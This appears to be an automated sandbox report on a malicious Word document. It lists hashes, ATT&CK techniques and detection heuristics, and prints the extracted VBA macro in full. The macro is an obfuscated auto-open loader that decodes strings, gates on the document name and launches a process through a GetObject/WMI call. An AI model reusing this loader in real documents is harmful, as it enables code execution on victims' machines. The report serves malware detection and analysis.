Office (OLE) / .DOC malware analysis — malicious · 6eb4be179e9388cd

MALICIOUS

Office (OLE) / .DOC

49.0 KB Created: 2026-06-07 14:27:00 Authoring application: Microsoft Office Word First seen: 2026-06-12

MD5: c0f5e204237f6961fc8cfb2ba808c036 SHA-1: 2b49c497993371f44aa3981a3880a99e00c72f71 SHA-256: 6eb4be179e9388cd8baaeb4c836defe383f5db883539295c20b94d6576ca43dd

190 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample contains obfuscated VBA macros that automatically execute upon opening. The AutoOpen macro calls a function that decodes a string and then uses GetObject to execute it, likely downloading and running a second-stage payload. The decoded string is '212205210203132149150155146148146148146149', which is then processed by a decoding function.

Heuristics 7

VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Matched line in script
```
GetObject(vi2cxnx7pzxwfz1fk0qapyhuqnigo3200k).Get(e5ca22rchaysxzcyu2texchpjwu7aidfh7x).Create ddhao5rsqkjjgc_b5m1z39eypacvt0h9cg5ipc, eqti5eq45il2pe5sosnqzt2hff9rb75z5, eqti5eq45il2pe5sosnqzt2hff9rb75z5, axa64zdnqqq6wwf6k9_neq7s5wg3ace9
```

GetObject call high OLE_VBA_GETOBJ

GetObject call

Matched line in script

GetObject(vi2cxnx7pzxwfz1fk0qapyhuqnigo3200k).Get(e5ca22rchaysxzcyu2texchpjwu7aidfh7x).Create ddhao5rsqkjjgc_b5m1z39eypacvt0h9cg5ipc, eqti5eq45il2pe5sosnqzt2hff9rb75z5, eqti5eq45il2pe5sosnqzt2hff9rb75z5, axa64zdnqqq6wwf6k9_neq7s5wg3ace9

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2775 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2775 bytes
SHA-256: `e3ab0ded95f4e1082ba9a40510e534e010866eadfe8898fe44b3a04ae71e6e5a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NewMacros" Sub AutoOpen() jz054rbwtixmwa6jejbwon7cvbobz1gx End Sub Sub jz054rbwtixmwa6jejbwon7cvbobz1gx() Dim l8tdecw4cozlmnzocl4k5m1dsjqfuio2v As String Dim ddhao5rsqkjjgc_b5m1z39eypacvt0h9cg5ipc As String l8tdecw4cozlmnzocl4k5m1dsjqfuio2v = "212205210203132149150155146148146148146149" ddhao5rsqkjjgc_b5m1z39eypacvt0h9cg5ipc = oxu2evofdxsizrycavxlka2xzoscvwelnm(l8tdecw4cozlmnzocl4k5m1dsjqfuio2v) On Error Resume Next If ActiveDocument.Name <> oxu2evofdxsizrycavxlka2xzoscvwelnm("204201208208211146200211199") Then Exit Sub End If On Error GoTo 0 Dim vi2cxnx7pzxwfz1fk0qapyhuqnigo3200k As String Dim e5ca22rchaysxzcyu2texchpjwu7aidfh7x As String Dim axa64zdnqqq6wwf6k9_neq7s5wg3ace9 As Variant Dim eqti5eq45il2pe5sosnqzt2hff9rb75z5 As Variant vi2cxnx7pzxwfz1fk0qapyhuqnigo3200k = oxu2evofdxsizrycavxlka2xzoscvwelnm("219205210209203209216215158192192146192214211211216192199205209218150") e5ca22rchaysxzcyu2texchpjwu7aidfh7x = oxu2evofdxsizrycavxlka2xzoscvwelnm("187205210151150195180214211199201215215") eqti5eq45il2pe5sosnqzt2hff9rb75z5 = Null GetObject(vi2cxnx7pzxwfz1fk0qapyhuqnigo3200k).Get(e5ca22rchaysxzcyu2texchpjwu7aidfh7x).Create ddhao5rsqkjjgc_b5m1z39eypacvt0h9cg5ipc, eqti5eq45il2pe5sosnqzt2hff9rb75z5, eqti5eq45il2pe5sosnqzt2hff9rb75z5, axa64zdnqqq6wwf6k9_neq7s5wg3ace9 End Sub Function nj2nt75h5d1yj3kftbzs7my9hdkpo9u(EwEzUQXdDBaJZwBWymxYzQSDF) nj2nt75h5d1yj3kftbzs7my9hdkpo9u = Chr(EwEzUQXdDBaJZwBWymxYzQSDF - 1) End Function Function tw9mxq9qumbcrtd1aq9jjhi96akuz5vm(BoYxVZOoOfsQzTgHCeRQcmmLTZcjKeCubBVNPx) tw9mxq9qumbcrtd1aq9jjhi96akuz5vm = Left(BoYxVZOoOfsQzTgHCeRQcmmLTZcjKeCubBVNPx, 3) End Function Function fpye4wvj2btq6t0x2zmh0v7skfb4cjuayx_lhsb(ytjtQVKAOOrRCfOTiYKkBVqtsYQMndYYzWVjjVHhiqyGsCg) fpye4wvj2btq6t0x2zmh0v7skfb4cjuayx_lhsb = Right(ytjtQVKAOOrRCfOTiYKkBVqtsYQMndYYzWVjjVHhiqyGsCg, Len(ytjtQVKAOOrRCfOTiYKkBVqtsYQMndYYzWVjjVHhiqyGsCg) - 3) End Function Function oxu2evofdxsizrycavxlka2xzoscvwelnm(HDYriBRyDhknwmYPVplOWxiJLVGvYzbqUjxlPdGj) Do OBIpsEgAPnGsVlQdEcOljijPlscYLOvnxa = OBIpsEgAPnGsVlQdEcOljijPlscYLOvnxa + nj2nt75h5d1yj3kftbzs7my9hdkpo9u(tw9mxq9qumbcrtd1aq9jjhi96akuz5vm(HDYriBRyDhknwmYPVplOWxiJLVGvYzbqUjxlPdGj)) HDYriBRyDhknwmYPVplOWxiJLVGvYzbqUjxlPdGj = fpye4wvj2btq6t0x2zmh0v7skfb4cjuayx_lhsb(HDYriBRyDhknwmYPVplOWxiJLVGvYzbqUjxlPdGj) Loop While Len(HDYriBRyDhknwmYPVplOWxiJLVGvYzbqUjxlPdGj) > 0 oxu2evofdxsizrycavxlka2xzoscvwelnm = OBIpsEgAPnGsVlQdEcOljijPlscYLOvnxa End Function

SHA-256: e3ab0ded95f4e1082ba9a40510e534e010866eadfe8898fe44b3a04ae71e6e5a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub AutoOpen()
jz054rbwtixmwa6jejbwon7cvbobz1gx
End Sub
Sub jz054rbwtixmwa6jejbwon7cvbobz1gx()
Dim l8tdecw4cozlmnzocl4k5m1dsjqfuio2v As String
Dim ddhao5rsqkjjgc_b5m1z39eypacvt0h9cg5ipc As String
l8tdecw4cozlmnzocl4k5m1dsjqfuio2v = "212205210203132149150155146148146148146149"
ddhao5rsqkjjgc_b5m1z39eypacvt0h9cg5ipc = oxu2evofdxsizrycavxlka2xzoscvwelnm(l8tdecw4cozlmnzocl4k5m1dsjqfuio2v)
On Error Resume Next
If ActiveDocument.Name <> oxu2evofdxsizrycavxlka2xzoscvwelnm("204201208208211146200211199") Then
Exit Sub
End If
On Error GoTo 0
Dim vi2cxnx7pzxwfz1fk0qapyhuqnigo3200k As String
Dim e5ca22rchaysxzcyu2texchpjwu7aidfh7x As String
Dim axa64zdnqqq6wwf6k9_neq7s5wg3ace9 As Variant
Dim eqti5eq45il2pe5sosnqzt2hff9rb75z5 As Variant
vi2cxnx7pzxwfz1fk0qapyhuqnigo3200k = oxu2evofdxsizrycavxlka2xzoscvwelnm("219205210209203209216215158192192146192214211211216192199205209218150")
e5ca22rchaysxzcyu2texchpjwu7aidfh7x = oxu2evofdxsizrycavxlka2xzoscvwelnm("187205210151150195180214211199201215215")
eqti5eq45il2pe5sosnqzt2hff9rb75z5 = Null
GetObject(vi2cxnx7pzxwfz1fk0qapyhuqnigo3200k).Get(e5ca22rchaysxzcyu2texchpjwu7aidfh7x).Create ddhao5rsqkjjgc_b5m1z39eypacvt0h9cg5ipc, eqti5eq45il2pe5sosnqzt2hff9rb75z5, eqti5eq45il2pe5sosnqzt2hff9rb75z5, axa64zdnqqq6wwf6k9_neq7s5wg3ace9
End Sub
Function nj2nt75h5d1yj3kftbzs7my9hdkpo9u(EwEzUQXdDBaJZwBWymxYzQSDF)
nj2nt75h5d1yj3kftbzs7my9hdkpo9u = Chr(EwEzUQXdDBaJZwBWymxYzQSDF - 1)
End Function
Function tw9mxq9qumbcrtd1aq9jjhi96akuz5vm(BoYxVZOoOfsQzTgHCeRQcmmLTZcjKeCubBVNPx)
tw9mxq9qumbcrtd1aq9jjhi96akuz5vm = Left(BoYxVZOoOfsQzTgHCeRQcmmLTZcjKeCubBVNPx, 3)
End Function
Function fpye4wvj2btq6t0x2zmh0v7skfb4cjuayx_lhsb(ytjtQVKAOOrRCfOTiYKkBVqtsYQMndYYzWVjjVHhiqyGsCg)
fpye4wvj2btq6t0x2zmh0v7skfb4cjuayx_lhsb = Right(ytjtQVKAOOrRCfOTiYKkBVqtsYQMndYYzWVjjVHhiqyGsCg, Len(ytjtQVKAOOrRCfOTiYKkBVqtsYQMndYYzWVjjVHhiqyGsCg) - 3)
End Function
Function oxu2evofdxsizrycavxlka2xzoscvwelnm(HDYriBRyDhknwmYPVplOWxiJLVGvYzbqUjxlPdGj)
Do
OBIpsEgAPnGsVlQdEcOljijPlscYLOvnxa = OBIpsEgAPnGsVlQdEcOljijPlscYLOvnxa + nj2nt75h5d1yj3kftbzs7my9hdkpo9u(tw9mxq9qumbcrtd1aq9jjhi96akuz5vm(HDYriBRyDhknwmYPVplOWxiJLVGvYzbqUjxlPdGj))
HDYriBRyDhknwmYPVplOWxiJLVGvYzbqUjxlPdGj = fpye4wvj2btq6t0x2zmh0v7skfb4cjuayx_lhsb(HDYriBRyDhknwmYPVplOWxiJLVGvYzbqUjxlPdGj)
Loop While Len(HDYriBRyDhknwmYPVplOWxiJLVGvYzbqUjxlPdGj) > 0
oxu2evofdxsizrycavxlka2xzoscvwelnm = OBIpsEgAPnGsVlQdEcOljijPlscYLOvnxa
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.